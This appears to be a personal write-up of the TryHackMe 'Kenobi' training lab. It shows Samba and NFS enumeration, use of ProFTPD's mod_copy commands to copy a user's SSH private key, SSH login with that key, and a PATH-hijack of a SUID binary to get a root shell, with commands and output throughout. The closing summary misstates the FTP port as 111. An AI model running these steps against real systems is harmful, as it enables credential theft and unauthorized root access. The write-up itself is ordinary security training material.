Kenobi - THM Write-Up

Kenobi - THM Write-Up

Difficulty - Easy

Description from THM

Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.

The Kenobi room in TryHackMe has several tasks for us to complete. I am following along with the steps in this room and I'll answer them as we go along (the questions are bolded), however, please know I will not share any credentials or flags. As I hope you will attempt this on your own as well!

Let's begin!


Tools

  • Nmap
  • gobuster
  • smbclient
  • netcat
  • searchploit

Task 1 - Deploy the machine and scan the network

I am using the THM AttackBox to complete this room

First we'll run an nmap scan of the target machine!

root@ip-10-10-204-174:~# nmap -sC -sV 10.10.116.87

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-12 23:40 GMT
Nmap scan report for ip-10-10-116-87.eu-west-1.compute.internal (10.10.116.87)
Host is up (0.0012s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37226/udp  mountd
|   100005  1,2,3      38223/tcp  mountd
|   100021  1,3,4      36819/tcp  nlockmgr
|   100021  1,3,4      54561/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:5B:4D:DE:0D:87 (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2022-03-12T17:41:02-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-12 23:41:02
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds

How many ports are open? There are 7 ports open.

  • Port 21 - FTP (ProFTPD 1.3.5)
  • Port 22 - SSH
  • Port 80 - HTTP
  • Port 111 - RPCBind
  • Port 139/445 - SMB
  • Port 2049 - NFS_ACL

Let's take a quick peek at the web server on Port 80 first. The nmap scan also provided us with the /admin.html page.

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

image.png

We get a lovely photo of Obi-Wan Kenobi fighting Anakin Skywalker.

image.png

When we go to the /admin.html page we get a GIF of Admiral Ackbar saying "IT'S A TRAP!"

So far these are the only two web pages we can look at, let's give gobuster a try and see if we can find any more directories.

root@ip-10-10-204-174:~# gobuster dir -u http://10.10.116.87/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.116.87/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2022/03/13 00:02:32 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2022/03/13 00:02:32 Finished
===============================================================

Nothing useful for us, so let's move on and try to enumerate smb for shares!

Task 2 - Enumerating Samba for shares

To enumerate SMB shares we can use nmap. Nmap has a script that lets us do so!

We can do this with the following command:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

  • -p - we can select the port we're using, in this case Port 445 (SMB has two ports: 139 (older version of SMB) and 445 (later versions))
  • --script - we use this switch to select the script(s) we want to use
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 02:5B:4D:DE:0D:87 (Unknown)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.116.87\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.116.87\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.116.87\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

How many shares have been found? There are 3 shares:

  • \\10.10.116.87\IPC$
  • \\10.10.116.87\anonymous
  • \\10.10.116.87\print$

Now let's check how the \\10.10.116.87\anonymous share first, since that looks like the most interesting one!

We can use the following command, which uses smbclient to access this share:

smbclient //<ip>/anonymous

When it asks for password just hit ENTER, since we haven't discovered any password(s) yet.

root@ip-10-10-204-174:~# smbclient //10.10.116.87/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 11:49:09 2019
  ..                                  D        0  Wed Sep  4 11:56:07 2019
  log.txt                             N    12237  Wed Sep  4 11:49:09 2019

        9204224 blocks of size 1024. 6876652 blocks available

What is the file that we see? We can see the log.txt file. To open this file we can run get log.txt and we can open it on our machine.

Upon opening it, we get information about an SSH key generated for Kenobi and information about the ProFTPD server.

Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName            "ProFTPD Default Installation"
ServerType            standalone
DefaultServer            on

# Port 21 is the standard FTP port.
Port                21

What port is FTP running on? We know from earlier and the information in the file that FTP is on Port 21.

Let's continuing enumerating though! From our nmap scan earlier, Port 111 was running rpcbind.

Here's a snippet of what this server is from THM:

This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.

For us, port 111 is access to a network file system. We can use nmap to enumerate this by using the following command:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <ip>

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836980.0  6876648.0  22%   16.0T        32000
MAC Address: 02:5B:4D:DE:0D:87 (Unknown)

What mount can we see? We can see /var.

We've done quite a bit of enumerating, so let's move onto the third task now.

Task 3 - Gain initial access with ProFtpd

Here is a description from THM for ProFtpd:

ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

Let's figure out the version of ProFtpd. We can check our nmap scan from earlier, which shows us version 1.3.5. Or we can use netcat to connect to the machine on the FTP port.

root@ip-10-10-204-174:~# nc 10.10.116.87 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.116.87]

THM recommends we use searchploit to find exploits for our version.

root@ip-10-10-204-174:~# searchsploit proftpd 1.3.5
[i] Found (#2): /opt/searchsploit/files_exploits.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#2): /opt/searchsploit/files_shellcodes.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Executi | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command  | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                  | linux/remote/36742.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

Here is another note from THM:

You should have found an exploit from ProFtpd's mod_copy module.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

Earlier we gathered that the FTP service is running as the Kenobi user and an SSH was generated for that user. We're now going to copy Kenobi's private key using the commands we just learned about from THM (SITE CPFR and SITE CPTO).

To do this we need to run netcat again and run the commands like so:

root@ip-10-10-204-174:~# nc 10.10.116.87 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.116.87]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

What this did was copy from (CPFR) the /home/kenobi/.ssh/id_rsa file. Then copied it to (CPTO) /var/tmp/id_rsa (remember the mount we discovered earlier /var).

We'll need to mount the /var/tmp directory to our machine (these commands are provided by THM):

mkdir /mnt/kenobiNFS

mount machine_ip:/var /mnt/kenobiNFS

ls -la /mnt/kenobiNFS

root@ip-10-10-204-174:~# sudo mkdir /mnt/kenobiNFS
root@ip-10-10-204-174:~# sudo mount 10.10.116.87:/var /mnt/kenobiNFS
root@ip-10-10-204-174:~# ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root  4096 Sep  4  2019 .
drwxr-xr-x  3 root root  4096 Mar 13 01:31 ..
drwxr-xr-x  2 root root  4096 Sep  4  2019 backups
drwxr-xr-x  9 root root  4096 Sep  4  2019 cache
drwxrwxrwt  2 root root  4096 Sep  4  2019 crash
drwxr-xr-x 40 root root  4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff 4096 Apr 12  2016 local
lrwxrwxrwx  1 root root     9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root lxd   4096 Sep  4  2019 log
drwxrwsr-x  2 root mail  4096 Feb 26  2019 mail
drwxr-xr-x  2 root root  4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root     4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root  4096 Jan 29  2019 snap
drwxr-xr-x  5 root root  4096 Sep  4  2019 spool
drwxrwxrwt  6 root root  4096 Mar 13 01:17 tmp
drwxr-xr-x  3 root root  4096 Sep  4  2019 www

The network mount is on our machine. Now we can attempt logging into Kenobi's account! We'll need to get to the id_rsa file and login using SSH.

root@ip-10-10-204-174:~# cp /mnt/kenobiNFS/tmp/id_rsa .
root@ip-10-10-204-174:~# sudo chmod 600 id_rsa
root@ip-10-10-204-174:~# ssh -i id_rsa kenobi@10.10.116.87
The authenticity of host '10.10.116.87 (10.10.116.87)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.116.87' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$

We now have access as the Kenobi user! THM now wants us to get the user flag:

kenobi@kenobi:~$ ls 
share  user.txt
kenobi@kenobi:~$ cat user.txt 
<user flag here>

Task 4: Privilege Escalation with Path Variable Manipulation

This is our final task! Let's read what THM has to say about SUID bits:

SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.

THM provides us with a command to use to help us search the system for these types of files:

find / -perm -u=s -type f 2>/dev/null

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

What file looks particulary out of the ordinary? The /usr/bin/menu looks a bit odd. It could be worth checking out.

Run the binary, how many options appear?

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

There are 3 choices for us to choose from.

Let's continue with the task! We need to get the root flag. In order to do this, we'll need to manipulate our path to gain a root shell. THM provides us with the commands to do this:

kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
#

THM explains why we did this:

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the "curl" binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!

All that's left for us to do is find the root flag! We can run the following command to get it:

# cat /root/root.txt

Summary

I really enjoyed this Star Wars themed room! Especially since the new Obi-Wan Kenobi show is going to come out on Disney+ soon! We learned quite a lot in this room and practiced looking for samba shares and exploiting ProFtpd on Port 111. There are some things I personally have not done before such as getting a root shell through /usr/bin/menu. That is something I (we) should study on and look into. I"m happy that TryHackMe gave us some guidance boosts. Since this is considered one of the easy rooms, I know in the near future when I attempt the medium and hard levels THM won't hold our hands! But this is part of the learning process and getting used to using various tools! I hope you enjoyed this and I'll be posting more write-ups soon!